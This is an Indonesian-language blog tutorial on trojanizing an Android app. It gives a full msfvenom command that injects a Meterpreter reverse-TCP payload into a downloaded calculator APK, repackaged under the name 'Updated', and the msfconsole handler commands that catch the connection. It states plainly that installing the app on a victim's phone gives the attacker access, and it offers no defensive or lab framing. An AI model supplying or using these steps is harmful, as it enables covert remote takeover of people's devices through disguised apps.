Backdooring Aplikasi Android Menggunakan Metasploit

Ini sebenarnya adalah artikel yang ditulis ulang karena sebelumnya saya sudah pernah menulis artikel dengan tema serupa. Namun artikel lawas yang saya tulis di 2015 saya pikir sudah tidak relevan dikarenakan tool yang dipakai sudah tidak berfungsi lagi.

Sebagai catatan, di tutorial ini saya menggunakan Kali Linux, dimana tool yang dibutuhkan untuk tutorial ini sudah tersedia dari awal, yakni metasploit, msfvenom, apktool, dan apksigner.

Sebagai bahan tutorial, disini saya akan menyisipkan backdoor pada aplikasi Simple Calculator yang saya unduh dari APKPure.

Setelah file .apk diunduh, jalankan perintah msfvenom berikut:

msfvenom -x "Simple Calculator_2.1.0_Apkpure.apk" --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=31337 -o "Updated Simple Calculator_2.1.0_Apkpure.apk"

Penjelasan perintah:

  • msfvenom: Ini adalah perintah untuk memanggil tool msfvenom dalam Metasploit Framework. msfvenom digunakan untuk membuat payload yang digunakan dalam serangan.
  • -x "Simple Calculator_2.1.0_Apkpure.apk": Ini adalah opsi untuk menentukan file APK yang akan digunakan sebagai template. Dalam hal ini, file APK dengan nama "Simple Calculator_2.1.0_Apkpure.apk" akan dijadikan dasar.
  • --platform android: Ini adalah opsi untuk menentukan platform target, yaitu Android.
  • -p android/meterpreter/reverse_tcp: Ini adalah opsi untuk menentukan jenis payload yang akan dihasilkan. Dalam hal ini, payload yang dihasilkan akan menggunakan meterpreter dan melakukan koneksi reverse_tcp, yang berarti payload akan mencoba melakukan koneksi balik (reverse) ke alamat IP dan port yang ditentukan.
  • LHOST=192.168.0.150: Ini adalah opsi untuk menentukan alamat IP yang akan digunakan sebagai host (dalam hal ini, alamat IP host adalah "192.168.0.150").
  • LPORT=31337: Ini adalah opsi untuk menentukan nomor port yang akan digunakan untuk koneksi (dalam hal ini, port yang digunakan adalah "31337").
  • -o "Updated Simple Calculator_2.1.0_Apkpure.apk": Ini adalah opsi untuk menentukan nama dan lokasi file yang akan dihasilkan. Dalam hal ini, payload yang dihasilkan akan disimpan dalam file dengan nama "Updated Simple Calculator_2.1.0_Apkpure.apk".

Setelah backdoored APK dibuat, jalankan metasploit dan lakukan listening.

msfconsole -q

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.0.150

set LPORT 31337

run

Sesuaikan sendiri ya untuk LHOST dan LPORTnya. 

Maka ketika aplikasi Calculator yang sudah dibackdoor tadi dipasang di Android korban, maka kita akan mendapatkan akses kedalam android tersebut.


Oke mungkin sekian tutorial singkat kali ini, semoga bermanfaat. Jika ada yang ingin ditanyakan silahkan tinggalkan komentar.

Posting Komentar untuk "Backdooring Aplikasi Android Menggunakan Metasploit"